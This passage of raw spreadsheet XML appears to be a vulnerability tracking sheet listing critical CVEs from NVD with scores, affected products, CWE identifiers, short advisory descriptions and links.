t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L59" s="5" t="inlineStr" /><c r="M59" s="5" t="inlineStr" /><c r="N59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q59" s="5" t="inlineStr" /><c r="R59" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S59" s="5" t="inlineStr"><is><t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-77493</t></is></c><c r="D60" s="5" t="n"><v>9.800000000000001</v></c><c r="E60" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.01</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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0" s="5" t="inlineStr" /><c r="M60" s="5" t="inlineStr" /><c r="N60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q60" s="5" t="inlineStr" /><c r="R60" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S60" s="5" t="inlineStr"><is><t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-78445</t></is></c><c r="D61" s="5" t="n"><v>9.800000000000001</v></c><c r="E61" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.008999999999999999</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K61" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L61" s="5" t="inlineStr" /><c r="M61" s="5" t="inlineStr" /><c r="N61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q61" s="5" t="inlineStr" /><c r="R61" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S61" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-78509</t></is></c><c r="D62" s="5" t="n"><v>9.800000000000001</v></c><c r="E62" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.01</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr" /><c r="K62" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L62" s="5" t="inlineStr" /><c r="M62" s="5" t="inlineStr" /><c r="N62" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P62" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q62" s="5" t="inlineStr" /><c r="R62" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S62" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-78510</t></is></c><c r="D63" s="5" t="n"><v>9.800000000000001</v></c><c r="E63" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.01</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr" /><c r="K63" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L63" s="5" t="inlineStr" /><c r="M63" s="5" t="inlineStr" /><c r="N63" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q63" s="5" t="inlineStr" /><c r="R63" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S63" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-79569</t></is></c><c r="D64" s="5" t="n"><v>9.800000000000001</v></c><c r="E64" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.004</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr" /><c r="L64" s="5" t="inlineStr" /><c r="M64" s="5" t="inlineStr" /><c r="N64" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q64" s="5" t="inlineStr" /><c r="R64" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S64" s="5" t="inlineStr"><is><t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-79570</t></is></c><c r="D65" s="5" t="n"><v>9.800000000000001</v></c><c r="E65" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.003</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr" /><c r="L65" s="5" t="inlineStr" /><c r="M65" s="5" t="inlineStr" /><c r="N65" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q65" s="5" t="inlineStr" /><c r="R65" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S65" s="5" t="inlineStr"><is><t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-79574</t></is></c><c r="D66" s="5" t="n"><v>9.800000000000001</v></c><c r="E66" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.005</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr" /><c r="M66" s="5" t="inlineStr" /><c r="N66" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q66" s="5" t="inlineStr" /><c r="R66" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S66" s="5" t="inlineStr"><is><t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t></is></c><c r="T66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-79576</t></is></c><c r="D67" s="5" t="n"><v>9.800000000000001</v></c><c r="E67" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.003</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr" /><c r="M67" s="5" t="inlineStr" /><c r="N67" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q67" s="5" t="inlineStr" /><c r="R67" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S67" s="5" t="inlineStr"><is><t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t></is></c><c r="T67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-79577</t></is></c><c r="D68" s="5" t="n"><v>9.800000000000001</v></c><c r="E68" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.003</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr" /><c r="M68" s="5" t="inlineStr" /><c r="N68" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q68" s="5" t="inlineStr" /><c r="R68" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S68" s="5" t="inlineStr"><is><t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t></is></c><c r="T68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-65669</t></is></c><c r="D69" s="5" t="n"><v>9.6</v></c><c r="E69" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.007</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr" /><c r="M69" s="5" t="inlineStr" /><c r="N69" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q69" s="5" t="inlineStr" /><c r="R69" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="S69" s="5" t="inlineStr"><is><t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-81376</t></is></c><c r="D70" s="5" t="n"><v>9.6</v></c><c r="E70" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.006</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L70" s="5" t="inlineStr" /><c r="M70" s="5" t="inlineStr" /><c r="N70" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q70" s="5" t="inlineStr" /><c r="R70" s="5" t="inlineStr"><is><t>CWE-1023, CWE-693</t></is></c><c r="S70" s="5" t="inlineStr"><is><t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-76969</t></is></c><c r="D71" s="5" t="n"><v>9.4</v></c><c r="E71" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.003</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr" /><c r="M71" s="5" t="inlineStr" /><c r="N71" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q71" s="5" t="inlineStr" /><c r="R71" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S71" s="5" t="inlineStr"><is><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is></c><c r="T71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-82533</t></is></c><c r="D72" s="5" t="n"><v>9.4</v></c><c r="E72" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.006</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr" /><c r="L72" s="5" t="inlineStr" /><c r="M72" s="5" t="inlineStr" /><c r="N72" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q72" s="5" t="inlineStr" /><c r="R72" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S72" s="5" t="inlineStr"><is><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is></c><c r="T72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-62645</t></is></c><c r="D73" s="5" t="n"><v>9.300000000000001</v></c><c r="E73" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.003</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr" /><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr" /><c r="M73" s="5" t="inlineStr" /><c r="N73" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q73" s="5" t="inlineStr" /><c r="R73" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S73" s="5" t="inlineStr"><is><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is></c><c r="T73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-62647</t></is></c><c r="D74" s="5" t="n"><v>9.300000000000001</v></c><c r="E74" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.003</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr" /><c r="M74" s="5" t="inlineStr" /><c r="N74" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q74" s="5" t="inlineStr" /><c r="R74" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S74" s="5" t="inlineStr"><is><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is></c><c r="T74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-69356</t></is></c><c r="D75" s="5" t="n"><v>9.300000000000001</v></c><c r="E75" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.007</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr" /><c r="M75" s="5" t="inlineStr" /><c r="N75" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q75" s="5" t="inlineStr" /><c r="R75" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S75" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-76200</t></is></c><c r="D76" s="5" t="n"><v>9.300000000000001</v></c><c r="E76" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.005</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L76" s="5" t="inlineStr" /><c r="M76" s="5" t="inlineStr" /><c r="N76" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q76" s="5" t="inlineStr" /><c r="R76" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S76"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T76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-76201</t></is></c><c r="D77" s="5" t="n"><v>9.300000000000001</v></c><c r="E77" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.005</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L77" s="5" t="inlineStr" /><c r="M77" s="5" t="inlineStr" /><c r="N77" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q77" s="5" t="inlineStr" /><c r="R77" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S77"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T77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-78997</t></is></c><c r="D78" s="5" t="n"><v>9.300000000000001</v></c><c r="E78" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.003</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr" /><c r="L78" s="5" t="inlineStr" /><c r="M78" s="5" t="inlineStr" /><c r="N78" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q78" s="5" t="inlineStr" /><c r="R78" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S78" s="5" t="inlineStr"><is><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is></c><c r="T78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-67367</t></is></c><c r="D79" s="5" t="n"><v>9.199999999999999</v></c><c r="E79" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.008</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr" /><c r="L79" s="5" t="inlineStr" /><c r="M79" s="5" t="inlineStr" /><c r="N79" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q79" s="5" t="inlineStr" /><c r="R79" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S79" s="5" t="inlineStr"><is><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is></c><c r="T79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-82067</t></is></c><c r="D80" s="5" t="n"><v>9.199999999999999</v></c><c r="E80" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K80" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L80" s="5" t="inlineStr" /><c r="M80" s="5" t="inlineStr" /><c r="N80" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q80" s="5" t="inlineStr" /><c r="R80" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="S80" s="5" t="inlineStr"><is><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is></c><c r="T80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-84197</t></is></c><c r="D81" s="5" t="n"><v>9.199999999999999</v></c><c r="E81" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.002</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr" /><c r="M81" s="5" t="inlineStr" /><c r="N81" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q81" s="5" t="inlineStr" /><c r="R81" s="5" t="inlineStr"><is><t>CWE-295, CWE-297, CWE-300</t></is></c><c r="S81" s="5" t="inlineStr"><is><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is></c><c r="T81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2026-62646</t></is></c><c r="D82" s="5" t="n"><v>9.1</v></c><c r="E82" s="5" 